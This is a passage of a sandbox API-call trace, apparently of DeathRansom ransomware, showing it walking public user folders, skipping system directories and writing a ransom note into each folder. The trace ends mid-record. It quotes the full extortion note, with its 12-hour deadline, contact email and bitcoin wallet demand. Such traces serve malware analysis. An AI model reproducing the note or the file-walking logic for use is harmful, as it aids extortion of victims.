ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0077.002] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\read_me.txt") returned 40 [0077.002] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0077.002] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures") returned 44 [0077.002] lstrcmpW (lpString1="Sample Pictures", lpString2="..") returned 1 [0077.002] lstrcmpW (lpString1="Sample Pictures", lpString2=".") returned 1 [0077.002] StrStrW (lpFirst="sample pictures", lpSrch="programdata") returned 0x0 [0077.002] StrStrW (lpFirst="sample pictures", lpSrch="$recycle.bin") returned 0x0 [0077.002] StrStrW (lpFirst="sample pictures", lpSrch="program files") returned 0x0 [0077.002] StrStrW (lpFirst="sample pictures", lpSrch="windows") returned 0x0 [0077.002] StrStrW (lpFirst="sample pictures", lpSrch="all users") returned 0x0 [0077.002] StrStrW (lpFirst="sample pictures", lpSrch="appdata") returned 0x0 [0077.002] GetProcessHeap () returned 0x4f10000 [0077.002] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e41130 [0077.003] lstrcpyW (in: lpString1=0x8e41130, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures" [0077.003] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 135 [0077.003] QueueUserWorkItem (Function=0x40a710, Context=0x8e41130, Flags=0x0) returned 1 [0077.003] GetProcessHeap () returned 0x4f10000 [0077.003] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e51138 [0077.004] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*") returned 46 [0077.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0077.006] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\.") returned 46 [0077.006] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0077.006] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.006] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0077.006] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\..") returned 47 [0077.006] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.006] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0077.007] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0077.007] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0077.007] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0077.007] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.007] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0077.007] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Hydrangeas.jpg", cAlternateFileName="HYDRAN~1.JPG")) returned 1 [0077.007] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0077.007] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Jellyfish.jpg", cAlternateFileName="JELLYF~1.JPG")) returned 1 [0077.007] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0077.007] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Koala.jpg", cAlternateFileName="")) returned 1 [0077.007] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0077.007] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8907c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Lighthouse.jpg", cAlternateFileName="LIGHTH~1.JPG")) returned 1 [0077.007] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0077.007] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Penguins.jpg", cAlternateFileName="")) returned 1 [0077.007] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0077.007] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Tulips.jpg", cAlternateFileName="")) returned 1 [0077.007] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0077.007] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Tulips.jpg", cAlternateFileName="")) returned 0 [0077.007] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0077.008] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\read_me.txt") returned 56 [0077.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\read_me.txt" (normalized: "c:\\users\\public\\pictures\\sample pictures\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0077.009] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0077.009] WriteFile (in: hFile=0x780, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0077.010] CloseHandle (hObject=0x780) returned 1 [0077.010] GetProcessHeap () returned 0x4f10000 [0077.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e51138 | out: hHeap=0x4f10000) returned 1 [0077.010] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="sample pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0077.010] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0077.010] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\read_me.txt") returned 40 [0077.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\read_me.txt" (normalized: "c:\\users\\public\\pictures\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.010] GetProcessHeap () returned 0x4f10000 [0077.010] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8db00e0 | out: hHeap=0x4f10000) returned 1 [0077.010] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0077.010] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV") returned 31 [0077.010] lstrcmpW (lpString1="Recorded TV", lpString2="..") returned 1 [0077.010] lstrcmpW (lpString1="Recorded TV", lpString2=".") returned 1 [0077.010] StrStrW (lpFirst="recorded tv", lpSrch="programdata") returned 0x0 [0077.010] StrStrW (lpFirst="recorded tv", lpSrch="$recycle.bin") returned 0x0 [0077.010] StrStrW (lpFirst="recorded tv", lpSrch="program files") returned 0x0 [0077.011] StrStrW (lpFirst="recorded tv", lpSrch="windows") returned 0x0 [0077.011] StrStrW (lpFirst="recorded tv", lpSrch="all users") returned 0x0 [0077.011] StrStrW (lpFirst="recorded tv", lpSrch="appdata") returned 0x0 [0077.011] GetProcessHeap () returned 0x4f10000 [0077.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8db00e0 [0077.011] lstrcpyW (in: lpString1=0x8db00e0, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV") returned="\\\\?\\C:\\Users\\Public\\Recorded TV" [0077.011] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 136 [0077.011] QueueUserWorkItem (Function=0x40a710, Context=0x8db00e0, Flags=0x0) returned 1 [0077.011] GetProcessHeap () returned 0x4f10000 [0077.011] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e51138 [0077.011] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\*") returned 33 [0077.011] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0077.011] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\.") returned 33 [0077.011] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0077.011] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.011] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0077.011] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\..") returned 34 [0077.011] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.011] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.011] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0077.011] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0077.011] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media") returned 44 [0077.012] lstrcmpW (lpString1="Sample Media", lpString2="..") returned 1 [0077.012] lstrcmpW (lpString1="Sample Media", lpString2=".") returned 1 [0077.012] StrStrW (lpFirst="sample media", lpSrch="programdata") returned 0x0 [0077.012] StrStrW (lpFirst="sample media", lpSrch="$recycle.bin") returned 0x0 [0077.012] StrStrW (lpFirst="sample media", lpSrch="program files") returned 0x0 [0077.012] StrStrW (lpFirst="sample media", lpSrch="windows") returned 0x0 [0077.012] StrStrW (lpFirst="sample media", lpSrch="all users") returned 0x0 [0077.012] StrStrW (lpFirst="sample media", lpSrch="appdata") returned 0x0 [0077.012] GetProcessHeap () returned 0x4f10000 [0077.012] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e61140 [0077.013] lstrcpyW (in: lpString1=0x8e61140, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media" [0077.013] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 137 [0077.013] QueueUserWorkItem (Function=0x40a710, Context=0x8e61140, Flags=0x0) returned 1 [0077.013] GetProcessHeap () returned 0x4f10000 [0077.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e71148 [0077.014] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*") returned 46 [0077.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0077.014] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\.") returned 46 [0077.014] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0077.014] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.014] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0077.014] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\..") returned 47 [0077.014] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.014] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.014] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0077.014] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 1 [0077.014] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0077.014] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, 